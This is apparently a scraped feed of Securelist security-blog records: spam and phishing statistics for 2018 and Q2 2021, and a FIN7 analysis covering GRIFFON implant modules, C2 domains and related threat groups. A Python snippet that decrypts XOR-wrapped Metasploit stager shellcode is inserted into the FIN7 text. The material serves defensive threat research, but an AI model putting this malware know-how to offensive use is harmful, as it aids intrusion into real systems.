(19.54%) vacated the first line in the ranking of organizations most often used by cybercriminals as bait. Global internet portals (20.85%) stepped in as this quarter's leader. Moreover, the share of both categories increased relative to Q1: by 3.77 and 5.35 p.p., respectively. Third place belongs to banks (13.82%), which gained 3.78 p.p. 
in Q2.\n\n_Distribution of organizations whose users were targeted by phishers, by category, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03145107/10-en-spam-report-q2-2021.png>))_\n\nOverall, the list of the most popular organization categories among cybercriminals remained practically unchanged since the previous quarter, except that the shares of instant messengers (6.27%) and social networks (7.26%) almost drew level, and phishers preferred financial services (2.09%) to IT companies (1.68%).\n\n## Conclusion\n\nIn Q2, as we expected, cybercriminals continued to hunt for corporate account credentials and exploit the COVID-19 theme. A curious takeaway was the spike in investment-related activity. On the whole, however, the quarter did not deliver any surprises.\n\nAs for Q3 forecasts, the share of cyberattacks on the corporate sector is likely to stay the same. This is because remote working has established a firm foothold in the labor market. Also, the COVID-19 topic is unlikely to disappear from spam. And if the current crop of vaccination and compensation scams weren't enough, fraudsters could start utilizing newly identified strains of the virus to add variety and nowness to their schemes. What's more, during the vacation season, pandemic or not, we expect an increase in demand for intercity and international travel; as a result, the risk of encountering fake websites when buying tickets or booking accommodation will rise. Lastly, we will likely see waves of tourist-targeted attacks during major sporting occasions, such as the Olympic Games in Japan. 
Such events are always accompanied by thematic spam.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-05T10:00:45", "type": "securelist", "title": "Spam and phishing in Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2021-08-05T10:00:45", "id": "SECURELIST:A4072107882E39592149B0DB12585D70", "href": "https://securelist.com/spam-and-phishing-in-q2-2021/103548/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-03-12T10:51:16", "description": "\n\n## Numbers of the year\n\n * The share of spam in mail traffic was 52.48%, which is 4.15 p.p. 
less than in 2017.\n * The biggest source of spam this year was China (11.69%).\n * 74.15% of spam emails were less than 2 KB in size.\n * Malicious spam was detected most commonly with the Win32.CVE-2017-11882 verdict.\n * The Anti-Phishing system was triggered 482,465,211 times.\n * 18.32% of unique users encountered phishing.\n\n## Global events and spam\n\n### GDPR\n\nIn the [first months of the year](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/#gdpr-kak-povod-dlya-fishinga>) alone, we registered a great many emails in spam traffic connected in some way to the EU General Data Protection Regulation (GDPR). It was generally B2B spam \u2014 mostly invitations to paid seminars, webinars, and workshops promising to explain the ins and outs of the new regulation and its ramifications for business.\n\nDuring this period, there was an upturn in legitimate mailings too. Following the requirements of the regulation, companies sent out notifications on the transition to the GDPR policy requesting user consent to store and process personal data. Unsurprisingly, scammers tried to take advantage. Seeking to gain access to the personal data of clients of well-known companies, they sent out GDPR-related phishing emails prompting to update account information. Users who followed the link in the message and entered the required data immediately had it stolen by the fraudsters. It is worth noting that cybercriminals were interested largely in the data of clients of financial organizations and companies providing IT services.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11144832/190311-spam-report-2018-1.png>)\n\n \n_Phishing emails exploiting the GDPR topic_\n\n### 2018 FIFA World Cup\n\nThe [FIFA World Cup](<https://securelist.com/2018-fraud-world-cup/85878/>) was one of the main media events of the year, reaching far beyond the world of sport. 
Scammers exploited the World Cup topic using a variety of classic deception methods based on social engineering. Cybercriminals created fake FIFA partner websites to gain access to victims' bank accounts, carried out targeted attacks, and set up fake login pages for fifa.com accounts.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11144859/190311-spam-report-2018-2.png>)\n\n \n_Examples of messages with World Cup ticket and trip giveaways_\n\n### New iPhone launch\n\nAs is now customary, Apple's unveiling of its latest device caused a [spike in spam](<https://securelist.com/spam-and-phishing-in-q3-2018/88686/#vyxod-novogo-iphone>) sent, supposedly, from Chinese companies offering accessories and replica gadgets. Such messages redirect the recipient to newly created, generic online stores, which willingly accept payments, but are not so great when it comes to dispatching goods.\n\nThe release coincided with a slight rise in the number of phishing messages exploiting the Apple brand (and its services), and emails with malicious attachments:\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11144926/190311-spam-report-2018-3.png>)\n\n### Malware and the corporate sector\n\nIn 2018, the number of malicious messages in spam was 1.2 times less than in 2017; Mail Anti-Virus was triggered a total of 120,310,656 times among Kaspersky Lab clients.\n\n_Number of Mail Anti-Virus triggerings among Kaspersky Lab clients in 2018_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11151004/en-viruses-in-mail.png>)\n\n2018 saw a continuation of the trend for attention to detail in email presentation. Cybercriminals imitated actual business correspondence using the companies' real details, including signatures and logos. 
To bypass security solutions (and convince users that files were safe), ISO, IQY, PIF, and PUB attachments were used, all [non-typical formats for spam](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/#vredonosnye-iqy-vlozheniya>).\n\nCredit organizations remain one of the most popular targets, and this trend is likely to continue in 2019. We also expect an increase in the number of attacks on the corporate sector as a whole.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11144953/190311-spam-report-2018-4.png>)\n\n### New distribution channels\n\nWe have mentioned before that the distribution of phishing and other fraudulent content has gone beyond the scope of mailings. Scammers are not only testing new means of delivery, but getting victims themselves to distribute malicious content. Some of this year's most massive attacks we registered in messengers and social networks.\n\n\"Self-propagating\" phishing messages are similar to long-forgotten [chain letters](<https://en.wikipedia.org/wiki/Chain_letter>). They refer to non-existent giveaways or free lucrative offers, with one of the conditions for participation being to forward the message to friends or publish it on social media. At the start of the year, scammers used free air ticket lotteries as a bait, before switching to mailings supposedly from popular retail chains, restaurants, stores, and coffee bars. WhatsApp was the most common tool for distributing such messages.\n\n### Cryptocurrencies and spam\n\nIn 2018, far from waning, spammers' interest in cryptocurrencies rose. Among the spam messages were fraudulent ones attempting to coerce potential victims into transferring money to cryptocurrency wallets.\n\nOne of the most popular kinds of fraud seen last year was \"sextortion.\" This type of ransom scam is based on the claim to be in possession of private information of an intimate nature. 
To avoid disclosure, the victim is told to transfer money to the cryptocurrency wallet specified in the message, which often looks very convincing and uses the victim's actual personal data: name, passwords, phone numbers, etc. Against the backdrop of endless news reports about personal data leaks, such threats, backed up by real details, cause victims to panic and give in to the cybercriminals' demands. Last year, the ransom sum ranged from a few hundred to several thousand dollars.\n\nInitially, the mailings were aimed at an English-speaking audience, but at the end of Q3 we registered a wave of messages in other languages: German, Italian, Arabic, Japanese, French, Greek, and others.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11145029/190311-spam-report-2018-5.png>)\n\nNeither did the scammers forget about other fraud methods. Over the year, we identified fraudulent mailings supposedly from large charitable organizations asking to help children by purchasing some data etc. All these schemes had a common thread: The money transfer was requested in cryptocurrency. It should be noted that such messages were very few compared with the mailings described above.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11145103/190311-spam-report-2018-6.png>)\n\nIn 2019, spammers will continue to exploit the cryptocurrency topic. We expect to see more fraudulent mailings aimed at both extracting cryptocurrency and gaining access to personal accounts with various cryptocurrency services.\n\n## Phishing\n\n### Cryptocurrency\n\nCryptocurrency remains one of the most common phishing topics. In 2018, our Anti-Phishing system prevented 410,786 attempts to redirect users to phishing sites imitating popular cryptocurrency wallets, exchanges, and platforms. 
Fraudsters are actively creating fake login pages for cryptocurrency services in the hope of getting user credentials.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11145125/190311-spam-report-2018-7.png>)\n\nAnother hot topic last year was fake ICOs. Scammers invited victims to invest in various initial coin offerings not only by email, but through social media posts as well. There was something for everyone: One of the scams, for example, targeted buzcoin, a cryptocurrency named after Russian singer Olga Buzova. The cybercrooks managed to get hold of the project mailing list and send fake presale invitations to subscribers the day before the start of the ICO. Before the bona fide organizers had time to sneeze, the attackers had scooped around $15,000.\n\nBut it was the blockchain project of Pavel Durov, TON, which had the dubious honor of most fakes back in early 2018. The cryptocurrency boom and rumors in late 2017 about an ICO from the creator of Telegram provided fertile ground. Many people believed the scammers and, despite warnings from Pavel himself on social media, transferred money to them.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11145205/190311-spam-report-2018-8.png>)\n\n### Lotteries and surveys\n\nAnother way to nudge victims into transferring money is via the promise of a guaranteed [lottery win](<https://securelist.ru/easy-money-scum/92865/>) or a reward for taking part in a poll. In 2018, our security solutions blocked 3,200,180 attempted redirects to fraudulent websites offering lotteries or surveys.\n\nTo take part in the draw, users are asked to make a contribution: the more you give, the more you (supposedly) get. Survey scams work in a similar way. 
The victim is asked to transfer a sum of money to pay for \"administrative costs,\" after which the reward will be transferred, or so it is promised.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11145239/190311-spam-report-2018-9.png>)\n\n### Universities\n\nPhishers hunt not only for money, but also for [knowledge](<https://securelist.com/phishing-for-knowledge/88268/>): Over the past year, we registered phishing attacks against 131 universities in 16 countries. More than half (83) were in the US, followed by Britain (21), and Australia and Canada (7 each). One high-profile incident was the [theft](<https://www.telegraph.co.uk/technology/2018/09/14/iranian-hackers-sell-stolen-academic-research-top-british-universities/>) of millions of documents (including nuclear energy research) from several British universities.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11145314/190311-spam-report-2018-10.png>)\n\n### Taxes\n\nIn Q1 (the last quarter of the financial year in many countries), we observed a large number of phishing pages imitating the websites of HMRC (UK), the IRS (US), and other countries' tax authorities. Cybercriminals tried to finagle personal data, answers to security questions, bank account information, and other data from users. Some fake tax service sites distributed malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11145339/190311-spam-report-2018-11.png>)\n\n \n_Fake tax service websites_\n\n### HTTPS\n\nAs we wrote a year earlier, the number of phishing pages on domains with SSL certificates has increased. Ironically, this was facilitated by the widespread adoption of HTTPS, since pages with a certificate (and padlock) are trusted far more. But getting hold of a certificate is not hard, especially for competent cybercriminals. 
The problem has taken on such dimensions that, since September 2018 (Chrome 69), the browser no longer highlights HTTPS sites with a green padlock in the address bar or marks them as \"Secure.\" Instead, the \"Not secure\" label is now assigned to sites without HTTPS.\n\n### Sales\n\nEvery year, November sees the start of the sales season. First up is World Shopping Day, followed by Black Friday. Cybercriminals prepare for such events in advance and commence their mass attacks long before the sales start. According to our statistics, the number of attempts to redirect users to fraudulent websites exploiting the sales topic starts to rise at the end of October.\n\nFraudsters use standard methods to extract personal data and money from victims, including fake websites mimicking popular online stores with huge discounts on expensive goods.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11145406/190311-spam-report-2018-12.png>)\n\n## Statistics: spam\n\n### Proportion of spam in email traffic\n\nThe share of spam in email traffic in 2018 decreased by 4.15 p.p. to 52.48%.\n\n_Proportion of spam in global email traffic, 2018_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11150943/en-spam-in-traffic.png>)\n\nThe lowest share (47.70%) was recorded in April 2018. The highest (57.26%) belonged to December.\n\n### Sources of spam by country\n\nIn 2018, China (11.69%) led the list of spamming countries, swapping places with the US and consigning the former leader to second place with 9.04%. Third position went to Germany (7.17%), which climbed into the Top 3 from sixth.\n\nVietnam, which ranked third last year, fell to fourth place (6.09%). It was followed by Brazil (4.87%), India (4.77%), and Russia (4.29%).\n\nIn 8th place, as in 2017, came France (3.34%), while Iran and Italy departed the Top 10. 
They were replaced by newcomers Spain, which rose from 16th to 9th place (2.20%, +0.72 p.p.), and Britain (2.18%, +0.59 p.p.).\n\n_Sources of spam by country, 2018_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11150839/en-countries-source-spam.png>)\n\n### Spam email size\n\nIn 2018, the share of very small (up to 2 KB) messages increased significantly. Despite a quarterly decline, the annual figure came in at 74.15%, up 30.75 p.p. against the previous reporting period. The proportion of 2\u20135 KB messages also increased (10.64%, +5.56 p.p.).\n\n_Spam emails by size, 2018_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11151129/spam-size.png>)\n\nThe volume of larger spam dropped significantly against 2017. The share of messages sized 5\u201310 KB (7.37%) decreased by 1.77 p.p. and 10\u201320 KB (3.66%) by 12.6 p.p. The share of spam messages sized 20\u201350 KB (2.82%) saw the biggest drop, down 18.41 p.p.\n\n### Malicious attachments in email\n\n#### Malware families\n\n_Top 10 malware families in 2018_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11151047/malware-families.png>)\n\nIn 2018, the most widely distributed malicious objects in email, assigned the **Exploit.Win32.CVE-2017-11882** verdict, exploited a memory corruption vulnerability in the Microsoft Office Equation Editor component to execute arbitrary code without the user's knowledge.\n\nIn second place was the **Backdoor.Win32.Androm** bot, whose functionality depends on additional modules downloaded at the command of the C&C servers. It was most often used to download malware.\n\nThe **Trojan-PSW.Win32.Fareit** family moved up from fifth to third place. Its main task is to steal data (cookies, passwords for various FTP, mail, and other services). The harvested information is sent to the cybercriminals' server. 
Some members of the family are able to download and run other malware.\n\nThe **Worm.Win32.WBVB** family, which includes executable files written in Visual Basic 6 (in both P-code and Native mode) that are not trusted in KSN, remained in fourth place.\n\nFifth place went to the **Backdoor.Java.Qrat** family, a cross-platform multi-functional backdoor written in Java and sold in the Darknet as a [Malware-as-a-Service (MaaS)](<https://encyclopedia.kaspersky.com/glossary/malware-as-a-service-maas/>) package. It is generally distributed by email in JAR attachments.\n\n**Trojan-Downloader.MSOffice.SLoad**, a DOC/DOCX document containing a script that can be executed in MS Word, took sixth place. It is generally used to download and install ransomware on user computers.\n\nThe spyware **Trojan-Spy.Win32.Noon** ranked seventh.\n\nThe malware **Trojan.PDF.Badur**, which consists of a PDF document containing a link to a potentially dangerous website, dropped one place to eighth.\n\nNinth place was taken by the **Trojan.BAT.Obfus** family of malicious objects, obfuscated BAT files for running malware and changing OS security settings.\n\nIn tenth place, as in the previous year, was the family of Trojan downloaders **Trojan.Win32.VBKrypt**.\n\n### Countries targeted by malicious mailshots\n\nAs in previous years, first place in 2018 went to Germany. It accounted for 11.51% of all attacks. Second place was taken by Russia (7.21%), and Britain (5.76%) picked up bronze.\n\n_Countries targeted by malicious mailshots, 2018_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11150900/en-countries-target-spam.png>)\n\nThe next three, separated by a whisker, were Italy (5.23%), Brazil (5.10%), and Vietnam (5.09%). Trailing Vietnam by 1.35 p.p. in seventh was the UAE (3.74%). 
India (3.15%), Spain (2.51%), and Taiwan (2.44%) rounded off the Top 10.\n\n## Statistics: phishing\n\nIn 2018, the Anti-Phishing system was triggered 482,465,211 times on Kaspersky Lab user computers as a result of phishing redirection attempts (236,233,566 more than in 2017). In total, 18.32% of our users were attacked.\n\n### Organizations under attack\n\n_The rating of organizations targeted by phishing attacks is based on the triggering of the heuristic component in the Anti-Phishing system on user computers. This component detects every attempt to follow a link in an email or on the Internet to a phishing page that has yet to be added to Kaspersky Lab's databases._\n\n### Rating of categories of organizations attacked by phishers\n\nIn 2018, global Internet portals accounted for the lion's share of heuristic component triggers; their share increased by 11.23 p.p. to 24.72% against the previous year. In second place came the banking sector (21.70%), down 5.3 p.p. Payment systems (14.02%) in 2018 ranked third.\n\n_Distribution of organizations subject to phishing attacks by category, 2018._[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11150819/en-attacked-organizations.png>)\n\n### Top 3 organizations under attack from phishers\n\nThis rating is made up of organizations whose names were most frequently used by phishers (according to the heuristic statistics for triggers on user computers). It was the same lineup as in 2017, but rearranged slightly, with Microsoft in first place. 
\n \n**Organization** | **%** \n---|--- \nMicrosoft | 6.86% \nFacebook | 6.37% \nPayPal | 3.23% \n \n### Attack geography\n\n#### Countries by share of attacked users\n\nBrazil (28.28%) remains out in front by percentage of attacked unique users out of the total number of users in the country.\n\n_Percentage of users on whose computers the Anti-Phishing system was triggered out of all Kaspersky Lab users in the country, 2018 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/03/11150924/en-map.png>)\n\n#### Top 10 countries by share of attacked users\n\n**Country** | **%** \n---|--- \nBrazil | 28.28 \nPortugal | 22.63 \nAustralia | 20.72 \nAlgeria | 20.46 \nR\u00e9union | 20.39 \nGuatemala | 20.34 \nChile | 20.09 \nSpain | 20.05 \nVenezuela | 19.89 \nRussia | 19.76 \n \n_Top 10 countries by share of attacked users_\n\nDespite a slight drop of 0.74 p.p., Brazil (28.28%) remains top by share of attacked users. Meanwhile, Portugal (22.63%) moved up to second place (+5.87 p.p.), displacing Australia (20.72%, \u20131.79 p.p.).\n\n## Conclusion\n\n2018 showed that cybercriminals continue to keep a close eye on global events and use them to achieve their goals. We have seen a steady increase in phishing attacks on cryptocurrency-related resources, and expect new scams to appear in 2019. Despite the fall in value and the lean times for the cryptocurrency market as a whole, phishers and spammers will try to squeeze everything they can out of this topic.\n\nThe past year also demonstrated that spammers and scammers will continue to exploit annually occurring events \u2014 new smartphone launches, sales seasons, tax deadlines/rebates, and the like.\n\nThere is also a trend toward the transition to new channels of content distribution: Cybercriminals in 2018 used new methods of communication with their \"audience,\" including instant messengers and social networks, releasing wave after wave of self-propagating malicious messages. 
Hand in hand with this, as illustrated by the attack on universities, fraudsters are seeking not only new channels, but new targets as well.", "cvss3": {}, "published": "2019-03-12T10:00:16", "type": "securelist", "title": "Spam and phishing in 2018", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-03-12T10:00:16", "id": "SECURELIST:9CEE13B3A189B3DBB187C6946786F480", "href": "https://securelist.com/spam-and-phishing-in-2018/89701/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T14:29:15", "description": "\n\nOn August 1, 2018, the US Department of Justice announced that it had arrested several individuals suspected of having ties to the FIN7 cybercrime rig. FIN7 operations are linked to numerous intrusion attempts that have targeted hundreds of companies since at least as early as 2015. Interestingly, this threat actor created fake companies in order to hire remote pentesters, developers and interpreters to participate in their malicious business. The main goal behind its malicious activities was to steal financial assets from companies, such as debit cards, or get access to financial data or computers of finance department employees in order to conduct wire transfers to offshore accounts.\n\nIn 2018-2019, researchers from Kaspersky Lab's Global Research and Analysis Team analyzed various campaigns that used the same Tactics, Techniques and Procedures (TTPs) as the historic FIN7, leading the researchers to believe that this threat actor had remained active despite the 2018 arrests. In addition, during the investigation, we discovered certain similarities to other attacker groups that seemed to share or copy the FIN7 TTPs in their own operations.\n\n## **Recent FIN7 campaigns**\n\nThe FIN7 intrusion set continued its tailored spear phishing campaigns throughout last year. Kaspersky Lab has been able to retrieve some of these exchanges from a FIN7 target. 
The spear phishing campaigns were remarkably sophisticated from a social engineering perspective. In various cases, the operators exchanged numerous messages with their victims for weeks before sending their malicious documents. The emails were effective social-engineering attempts that appealed to a wide range of human emotions (fear, stress, anger, etc.) to elicit a response from their victims. One of the domains used by the attackers in their 2018 campaign of spear phishing contained more than 130 email aliases, leading us to think that more than 130 companies had been targeted by the end of 2018.\n\n### **Malicious Documents**\n\nWe have seen two types of documents sent to victims in these spear phishing campaigns. The first one exploits the INCLUDEPICTURE feature of Microsoft Word to get context information about the victim's computer, and the availability and version number of Microsoft Word. The second one, which in many cases is an Office document protected with a trivial password, such as \"12345\", \"1234\", etc., uses macros to execute a GRIFFON implant on the target's computer. In various cases, the associated macro also created scheduled tasks to make GRIFFON persistent.\n\nInterestingly, following some open-source publications about them, the FIN7 operators seem to have developed a homemade builder of malicious Office documents using ideas from ThreadKit, which they employed during the summer of 2018. The new builder inserts random values in the Author and Company metadata fields. 
Moreover, the builder lets the operators vary IOCs such as the filenames of the wscript.exe and schtasks.exe copies.\n\n**wscript.exe copy** | **schtasks.exe copy** | **Task name** | **C2** \n---|---|---|--- \nbyzNne10.exe | byzNne17.exe | TaskbyzNne | logitech-cdn[.]com \nc9FGG10.exe | c9FGG17.exe | Taskc9FGG | logitech-cdn[.]com \nzEsb10.exe | zEsb17.exe | TaskzEsb | servicebing-cdn[.]com \n \nIOCs extracted from documents that use schtasks for GRIFFON persistence\n\n**Author** | **Company** | **wscript.exe copy** | **C2** \n---|---|---|--- \nmogjxjtvte | mogjxjtvte | mswmex44.exe | logitech-cdn[.]com \nsoxvremvge | soxvremvge | c9FGG10.exe | logitech-cdn[.]com \ngareljtjhvd | gareljtjhvd | zEsb10.exe | servicebing-cdn[.]com \n \nIOCs extracted from regular documents associated with GRIFFON\n\n### **GRIFFON Implant**\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07144433/sas-fin-7-1.png>)\n\n_GRIFFON malware attack pattern_\n\nThe GRIFFON implant is a lightweight JScript validator-style implant without any persistence mechanism of its own. The malware is designed to receive modules, execute them in memory and send the results to the C2s. We were able to obtain four different modules during the investigation.\n\n#### **Reconnaissance module**\n\nThe first module downloaded by the GRIFFON malware to the victim's computer is an information-gathering JScript, which allows the cybercriminals to understand the context of the infected workstation. This module relies mainly on WMI and Windows objects to collect results, which are sent back to the operators. 
Interestingly, more than 20 artifacts are retrieved from the system by this implant during the reconnaissance stage, from the operating system installation date and time and Windows domain membership to a list of the workstation's monitors and their resolutions.\n\n#### **Meterpreter downloader**\n\nThe second module is used by the operators to execute an obfuscated PowerShell script, which contains a Meterpreter downloader widely known as \"_Tinymet_\". This downloader, seen in past FIN7 campaigns, downloads a one-byte XOR-encrypted (e.g., with key 0x50 or 0x51) piece of Meterpreter shellcode to execute.\n\n#### **Screenshot module**\n\nThe third module allows the operators to take a screenshot of the remote system. To do that, it also drops a PowerShell script on the workstation to execute. The script executes an open-source .NET class used for taking a screenshot. The resulting screenshot is saved at \"%TMP%/image.png\", sent back to the attackers by the GRIFFON implant and then deleted.\n\n#### **Persistence module**\n\nThe last retrieved module is a persistence module. If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim's workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. The attackers use a PowerLinks-style method to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the \"file-less\" aspect of this method.\n\nThanks to its light weight and modular architecture, the GRIFFON implant is the perfect validator. Even though we have been able to retrieve four different modules, it is possible that the FIN7 operators have more modules in their toolsets for achieving their objectives on the victim's workstation.\n\n## **On the hunt for GRIFFON infrastructure**\n\nAttackers make mistakes, and FIN7 is no exception. 
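Before following that trail, one practical note on the Meterpreter downloader module described above: a one-byte XOR wrapper leaves the stager trivially recoverable once the blob has been captured from the download. The following is an added example written for this page (not code from the original post, and not FIN7's, Tinymet's or Metasploit's own tooling) that brute-forces the key against the well-known Metasploit stager prologues. The sample blob is constructed for the example; the two prologue byte sequences are the only assumed knowledge, and the x64 one goes beyond the x86 case the text describes.

```python
"""Recover the one-byte XOR key wrapped around a Metasploit-style stager."""
from typing import Optional, Tuple

# Known stager prologues (well-documented Metasploit block-API stubs):
#   x86: cld; call <api_resolver>; pushad; mov ebp, esp
#   x64: cld; and rsp, -16; call <api_resolver>
# Anything beyond these two is an assumption to adjust per sample.
PROLOGUES = {
    "x86": bytes.fromhex("fce8820000006089e5"),
    "x64": bytes.fromhex("fc4883e4f0e8"),
}


def xor1(data: bytes, key: int) -> bytes:
    """XOR every byte with one key byte; the operation is its own inverse."""
    return bytes(b ^ key for b in data)


def recover_key(blob: bytes) -> Optional[Tuple[int, str]]:
    """Brute-force all 256 keys; return (key, arch) on a prologue match.

    The first byte alone pins the key (0xfc ^ blob[0]), so the loop is
    really a confirmation that the remaining prologue bytes agree too.
    """
    for arch, prologue in PROLOGUES.items():
        if len(blob) < len(prologue):
            continue
        for key in range(256):
            if xor1(blob[: len(prologue)], key) == prologue:
                return key, arch
    return None


def decrypt_stager(blob: bytes) -> Optional[bytes]:
    """Return the decrypted shellcode, or None if no prologue matched."""
    hit = recover_key(blob)
    return None if hit is None else xor1(blob, hit[0])


# Constructed sample: x86 prologue plus filler bytes, wrapped with key 0x51
# as the text describes. This is not a real payload.
SAMPLE_BLOB = xor1(PROLOGUES["x86"] + bytes(range(16, 64)), 0x51)

if __name__ == "__main__":
    key, arch = recover_key(SAMPLE_BLOB)
    print(f"{arch} stager, key=0x{key:02x}:",
          decrypt_stager(SAMPLE_BLOB)[:9].hex())
```

Point it at a blob pulled from the downloader's HTTP response instead of `SAMPLE_BLOB` and nothing else changes. If neither prologue matches, the wrapper is something other than a single-byte XOR or the stager is not a stock Metasploit one; a known-plaintext check against the block-API hash constants is the next thing to try.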
The major error made by its operators allowed us to follow the command and control servers of the GRIFFON implant last year. In order to trick blue teams and other DFIR analysts, the operators created fake HTTP 302 redirections to various Google services on their C2 servers.\n \n \n HTTP/1.1 302 Found\n Server: nginx\n Date: [redacted]\n Content-Type: text/html; charset=UTF-8\n Content-Length: 0\n Connection: keep-alive\n Location: https://cloud.google.com/cdn/\n\n**Returned headers for most of the GRIFFON C2 servers on port 443**\n\nThis error allowed us to follow the infrastructure week by week, until an individual posted the heuristic for tracking their C2s on Twitter at the end of December 2018. A few days after the tweet, in January 2019, the operators changed their landing page in order to prevent this type of tracking against their infrastructure.\n\n### **Fake pentest company**\n\nDuring the investigation related to the GRIFFON infrastructure, we found a strange overlap between the WHOIS record of an old GRIFFON C2 and the website of a fake company.\n\nAccording to the website, that domain supposedly belongs to a legitimate security company \"fully owned by the Russian Government\" (sic) and having offices in \"Moscow, Saint Petersburg and Yekaterinburg\", but the address says the company is located in Trump Tower, in New York. Given FIN7's previous use of false security companies, we decided to look deeper into this one.\n\nAs we were looking at the content of the website, it became evident that almost all of the text used was lifted from legitimate security-company websites. 
Phrases and sentences were borrowed from at least the following companies/sites:\n\n * DKSec \u2013 www.dksec.com\n * OKIOK \u2013 www.okiok.com/services/tailored-solutions\n * MainNerve \u2013 www.mainnerve.com\n * Datics \u2013 www.datatics.com/cyber-security\n * Perspective Risk \u2013 www.perspectiverisk.com\n * Synack \u2013 https://www.synack.com/company\n * FireEye \u2013 https://www.fireeye.com/services/penetration-testing.html\n\nThis company seems to have been used by the FIN7 threat actor to hire new people as translators, developers and pentesters. During our research, we found various job advertisements associated with the company on freelance and remote-work websites.\n\nIn addition to that, various individuals have mentioned the company in their resumes. We believe that some of these individuals may not even be aware that they are working for a cybercrime business.\n\n## **Links to other intrusion sets**\n\nWhile tracking numerous threat actors on a daily basis during the final days of 2018 and at the beginning of 2019, we discovered various activity clusters sharing certain TTPs associated with the FIN7 intrusion set. The link between these threat actors and FIN7 is still weak, but we decided to disclose a few hints regarding these in this blog post.\n\n### **CobaltGoblin/EmpireMonkey**\n\nHistorically, FIN7 has overlapped several times with Cobalt/EmpireMonkey in terms of TTPs. This activity cluster, which Kaspersky Lab has followed for a few years, uses various implants for targeting mainly banks, and developers of banking and money processing software solutions. At the end of 2018, the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims' networks. 
After a successful penetration, it uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network, where it can monetize its access.\n\nFIN7's last campaigns were targeting banks in Europe and Central America. This threat actor is [suspected of stealing](<https://www.timesofmalta.com/articles/view/20190225/local/how-bov-hackers-got-away-with-13-million.702800>) \u20ac13 million from Bank of Valletta, Malta, earlier this year.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/07150038/sas-fin-7-2.png>)\n\nExamples of malicious documents used from the end of 2018 to the beginning of 2019\n\nA few interesting overlaps between recent FIN7 and EmpireMonkey campaigns:\n\n * Both used macros to copy wscript.exe to another file, which began with \"ms\" (mses.exe \u2013 FIN7, msutil.exe \u2013 EmpireMonkey).\n * Both executed a JScript file named \"error\" in %TEMP% (Errors.txt in the case of FIN7, Errors.bat for EmpireMonkey).\n * Both used DocuSign decoy documents with different macros. The macros popped the same \"Document decryption error\" error message, even though the macro code itself is entirely different.\n\nWe have a high level of confidence in a historic association between FIN7 and Cobalt, even though we believe that these two clusters of activity are operated by different teams.\n\n### **AveMaria**\n\nAveMaria is a new botnet, whose first version we found in September 2018, right after the arrests of the FIN7 members. We have medium confidence that this botnet falls under the FIN7 umbrella. Functionally, AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers, email clients, messengers, etc., and can act as a keylogger. 
